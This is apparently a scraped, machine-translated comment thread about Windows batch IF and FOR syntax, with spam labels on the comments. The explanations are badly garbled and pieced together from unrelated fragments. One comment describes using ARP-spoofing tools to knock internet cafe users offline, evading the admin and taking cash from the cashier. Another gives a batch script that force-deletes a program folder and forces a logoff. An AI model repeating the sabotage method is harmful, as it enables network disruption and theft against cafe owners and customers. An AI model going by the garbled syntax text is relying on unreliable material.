    If there are specified files, the condition is established and runs the command, otherwise run the next sentence.
    . If if exist config.sys edit config.sys

    3, if / if not to execute the order
    If the return code is equal to the specified number, the condition is established, the running command is run, and the running command is run. Otherwise, run the next sentence.
    . If IF 2 GOTO X2
    DOS program Run a number will return a number to the DOS, called an error code or a return code, and the common return
    code is 0, 1.

    10.FOR command
    FOR command is a relatively complicated command, which is mainly used for the parameter to cycle the command within the specified range.
    When using the for command in the batch processing file, the specified variable should use %% variable

    FOR {%variable | %% variable} in (set) do commit []
    % Variable specifies a single letter replaceable parameter.
    (set) Specify one or a set of files. You can use the compatriots.
    Command specifies the command to execute each file.
    Command-Specify the parameter or command line switch to a specific command.
    When using the for command in the batch file, the specified variable should use %% variable
    instead of using %variable. The variable name is distinguished, so%i is different from%i

    . If the command extension is enabled, the following additional for command format will be subject to
    support:

    FOR /D %Variable in (set) do Command [Command-]

    If concentrated contains the passage, it is specified to match the directory name without matching the file
    .

    FOR /R [[Drive:] Path] %variable in (set) do Command [Command-

    FOR statement in each directory. If there is no specified directory after /r, use the current
    directory. If the set is only a single (.) Character, the directory tree is entered.

    FOR /L %Variable in (Start, STEP, END) Do Command [Command-PARA

    The number sequence of an incremental form from the beginning to the end.
    Therefore, (1,1,5) will produce sequence 1 2 3 4 5, (5, -1,1) will produce
    sequences (5 4 3 2 1).

    FOR /F ["Options %Variable in (File-SET) Do Command
    FOR /F ["Options %Variable in ("String") Do Command
    FOR /F ["options %variable in ('Command') do Command

    or or if there is an USEBACKQ option:

    FOR /F ["Options %variable in (File-set) Do Command
    FOR /F ["Options %Variable in ("String") Do Command
    FOR /F ["Options %Variable in ('Command') do Command

    is one or more file names. Before the next file is continued, each file has been opened, reads and processed.
    The processing includes reading files, divided it into a line of text, and then parsed each line
    The symbols with zero or more. Then use the foundation string variable value of the found symbol string
    Colt the for loop. In the default method,/f Separate the first blank symbol of
    in each line of each file. Skip the blank line. You can replace the default parsing operation by specifying "Options"
    The parameter. This quoted strings include one or more
    to specify the keywords of different analysis options. These keywords are:

    eol = c -refers to the ending of a row of notes (just one)
    skip = n -The number of rows ignored at the beginning of the file.
    delims = xxx -Fingeric separate symbols. This replace the
    default separators of the space and jump bond.
    tokens = x, y, m -n -Which symbols of each line are passed to each iteration
    for itself. This will lead to the
    format of the additional variable name. Specify the last character star number in the NTH symbol m
    , and
    so extra variables will be allocated and accepted by the last symbol analysis.
    usebackq -Specifying the new syntax has been used in the following category:
    The string of executing a post -quotation marker as a command and
    Use the dual quotation number to expand the file name.

    sample1:
    FOR /F "EOL =; tokens = 2,3* delims =," %I in (myfile.txt) do command
    n Each line in .txt, ignore those rows that make a segmentation, pass the second and third symbols of
    to the FOR program body; Boundary symbol. Please note that the statement of this for program body references%i to
    Coloning the second symbol, reference%j to obtain the third symbol, reference%k
    symbol. For a file with a space
    , you need to use the dual quotation sign to include the file name. In order to use this method to use the dual quotation marks, you also need to use the USEBACKQ option. Otherwise, the dual quotation will be
    The understanding is used as a string that defines a certain analysis.

    %I dedicated to explaining in the for statement.%j and%k are specifically explained by
    tokens = options. You can specify up to 26 symbols through tokens = one line
    , as long as you do not try to explain a variable that is higher than the letter ’z’ or
    ’z. Keep in mind that for variables are single letters, partials, and global;
    The can not have 52 or more at the same time.

    You can also use for /f to analyze logic on the adjacent string; the method is,
    Plores to include the brackets with a single number. In this way, the character
    will be regarded as a single input bank in a file.

    Finally, you can use the for /f command to analyze the output of the command. The method is to turn the
    into a inverted string. This string will be
    The is used as a command line and passed to a child CMD.EXE. Its output will be caught in

    memory and is used as file analysis. Therefore, the following example:

    FOR /F "usebackq delims ==" %I in (`set`) do @echo %i
    n will enumerate the environment in the current environment Variable name.

    It, the replacement of the for variable reference has been strengthened. You can now use the following
    option syntax:

    ~ i -delete any quotation ("), expand%i
    %~ fi -expand%i to a complete qualified qualifying Path name
    %~ di -only expand%i to one driver number
    %~ Pi -only to one path to one path
    %~ ni -only expand%i to one to one File name
    %~ xi -only expand%i to one file extension
    %~ SI -expanded path only contains short name
    %~ AI -expand%i to the file of the file to the file of the file File attribute
    %~ ti -expand%i to the date/time of the file
    %~ zi -expand%i to the size of the file
    %~ $ PATH The directory of the path environment variable, and expand the%i to the first complete qualified name found. If the environment variable
    is not defined or the file is not found, this combination key will expand
    empty string

  4. pearl jewelry wholesale in malaysia I am not engaged in the Internet, I do n’t understand these numbers, but in the last one I can see it, you just want to let the Internet cafe fall. Essence Essence
    is actually very simple. Whoever finds a software can be achieved. There are several Internet cafes installed with anti -virus and fire prevention, so that you can limit others’s network speed, control the cashier Let everyone go down! ~~ ``
    What software, network enforcement officer, kicking off all users of the game, it is best to install an ARP, so as not to let the network management discover you! When I had no money, I used these methods to engage in the Internet cafes downstairs, packed APR first, and then kicked all users. At this time, the network management was not on the cashier, and then rushed to the RMB. Restart, everything is normal (except network management)! ~ `` Haha

  5. wholesale gold chains for jewelry making Save the following content as Del.bat and execute

    Rem If it is a folder, the following line is commanded (forcibly deletes)
    REM, please use the short file name (if HC exceeds 8 characters)
    rd C: PROGRA ~ 1HC /S /Q
    REM If it is a file, the following line is ordered to act (forcibly deletes)
    del C: Program ~ 1HC /f /Q
    REM 5 seconds after 5 seconds Log out of the computer and forcibly turn off all programs
    %% system32shutdown -F -L -T 5

    Ginseng number L means cancellation

Leave a Comment